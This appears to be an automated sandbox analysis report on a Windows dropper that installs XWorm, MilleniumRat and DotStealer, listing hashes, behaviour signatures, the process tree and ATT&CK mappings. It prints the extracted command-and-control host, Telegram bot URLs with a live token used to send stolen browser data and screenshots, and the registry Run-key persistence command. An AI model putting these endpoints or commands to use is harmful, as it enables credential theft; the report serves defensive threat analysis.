Analysis
-
max time kernel
114s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
30-09-2024 11:30
Static task
static1
Behavioral task
behavioral1
Sample
Output.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Output.exe
Resource
win10v2004-20240802-en
General
-
Target
Output.exe
-
Size
11.6MB
-
MD5
d7c99b9559332b8652b2cf85c34f1dea
-
SHA1
cbd247890c862d964683f8dc81cc3d7747bdfb73
-
SHA256
53d398e45aaad1c1cbbb4be5abd2a0d2c039b746792fb63bd8b9b28aebf359ca
-
SHA512
184945ec88ebe3e3ec5e3a71b9870b3459a0bb37491a665f356d3cb7286e0e79bed44a19e21cceba0fe0ec07a1d89e2238c70b06bd9c5dc5956b7715e8a8911f
-
SSDEEP
196608:tO3ytpGu2gWR5fMEseOI8LG8Ac+g6sFZstcVw8q1Q6HmVF:tO3j5gWR5fBSI58t+gbZst9
Malware Config
Extracted
xworm
reason-warnings.gl.at.ply.gg:20382
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
gurcu
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4594364141&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0%20kb
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendMessage?chat_id=-4594364141
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/getUpdates?offset=-
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4590251468&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20138.199.29.44%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4594364141&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000700000002347e-17.dat family_xworm behavioral2/memory/4384-25-0x0000000000820000-0x0000000000852000-memory.dmp family_xworm -
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation Output.exe Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation qscan_original.exe Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation built.exe Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation DotStealerBuild.exe -
Executes dropped EXE 4 IoCs
pid Process 3080 qscan_original.exe 4384 system user.exe 3152 built.exe 452 DotStealerBuild.exe -
Loads dropped DLL 2 IoCs
pid Process 3152 built.exe 452 DotStealerBuild.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\built.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 8 raw.githubusercontent.com 10 raw.githubusercontent.com 14 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier built.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 DotStealerBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier DotStealerBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 built.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2008 reg.exe -
Suspicious behavior: EnumeratesProcesses 53 IoCs
pid Process 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 3152 built.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 452 DotStealerBuild.exe 3152 built.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4384 system user.exe Token: SeDebugPrivilege 3152 built.exe Token: SeDebugPrivilege 452 DotStealerBuild.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3152 built.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 4496 wrote to memory of 3080 4496 Output.exe 82 PID 4496 wrote to memory of 3080 4496 Output.exe 82 PID 4496 wrote to memory of 4384 4496 Output.exe 83 PID 4496 wrote to memory of 4384 4496 Output.exe 83 PID 3080 wrote to memory of 3152 3080 qscan_original.exe 84 PID 3080 wrote to memory of 3152 3080 qscan_original.exe 84 PID 3080 wrote to memory of 452 3080 qscan_original.exe 85 PID 3080 wrote to memory of 452 3080 qscan_original.exe 85 PID 3152 wrote to memory of 4600 3152 built.exe 90 PID 3152 wrote to memory of 4600 3152 built.exe 90 PID 4600 wrote to memory of 2008 4600 cmd.exe 92 PID 4600 wrote to memory of 2008 4600 cmd.exe 92 PID 452 wrote to memory of 2680 452 DotStealerBuild.exe 95 PID 452 wrote to memory of 2680 452 DotStealerBuild.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\Output.exe"C:\Users\Admin\AppData\Local\Temp\Output.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Users\Admin\AppData\Roaming\qscan_original.exe"C:\Users\Admin\AppData\Roaming\qscan_original.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Users\Admin\AppData\Roaming\built.exe"C:\Users\Admin\AppData\Roaming\built.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\built.exe /f4⤵
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\built.exe /f5⤵
- Adds Run key to start application
- Modifies registry key
PID:2008
-
-
-
-
C:\Users\Admin\AppData\Roaming\DotStealerBuild.exe"C:\Users\Admin\AppData\Roaming\DotStealerBuild.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpA76B.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpA76B.tmp.bat4⤵PID:2680
-
-
-
-
C:\Users\Admin\AppData\Roaming\system user.exe"C:\Users\Admin\AppData\Roaming\system user.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4384
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
180B
MD590c32a443b766d13a18c2667f1fe4c1c
SHA1cc83881532987be840f5cd8367cc76be22a9df34
SHA256f1f5fcdcdd790ced70395489a454d47937739d5a36c34f0554224b9d98bf3bf2
SHA5121abc2817875627021dd58c5740cc6b451e41552126251e51b7ad8770e3a4615d1e7925d49bb2dcd961fc94af1b32da362027357eba6fe969b0119e8f56f2f5c9
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
5.6MB
MD5f239a3a3bf4ae3bdf42659c2c22cb270
SHA13827636f0703be1a9dfbd3ff9efce30ef0da43c8
SHA256a5fb7d12b140c0adfcefce222d9806233b6dcca69533e84f5f82f7216b097263
SHA51256df258f8eb274ddd128ed98ddd1a80af14f11a2799201b8a34319e7680e169a51b2377922dced4e6ea4a1d2d69b37c807d9ffafd178a0c056c055655d8cd9ae
-
Filesize
5.6MB
MD50edfa1005fee9b98800ab3e447944c87
SHA15ab856560c8293044f2a2391aae9c4961e2ddd03
SHA2561e1760588cdd811a36243278251a1da277b30e1c8451cfbdcab83a26f34d0611
SHA512033d320728072fb3dd51b08d97871554c68779485f0c8e13c9d887ea0b1d02b29e53e2c06324e92959242e17b16cbd80a822034a78307acc983a49abb3556074
-
Filesize
11.3MB
MD54bee8c6e2c7a30b0fd7d468532c19447
SHA1d91dcf39c0c8f360411cb0f9fc31c9a5dd2c8f7c
SHA2561c9f16ebad32e5d7e124e0553ce52802040fc70448a04af42a1b934080288c09
SHA5123b7e908bf6162141e5d42951216897b849fe37404d25beacacc3a0c096c7d76738ddf16f55d271ec9eadb00c75b257937f4a02e5bae4a730f3f17cbd44ca72fa
-
Filesize
179KB
MD56082abd8cccf27a1c8527210c139489f
SHA1f3b5ceb84ebdcb8df4abfdce3cac47293bad0e2f
SHA256ce1d896325cac0ef1f0332d6b513987566ce29a5a6a56275496ba5f38e3d292d
SHA51278cbe63b1280909306e6759328a2e8eeff22c0c925135ee842d55738f4d51bad89ee68a2022cc34da656280621a2aeb112fcd5712bed1349ec38eb646897eb34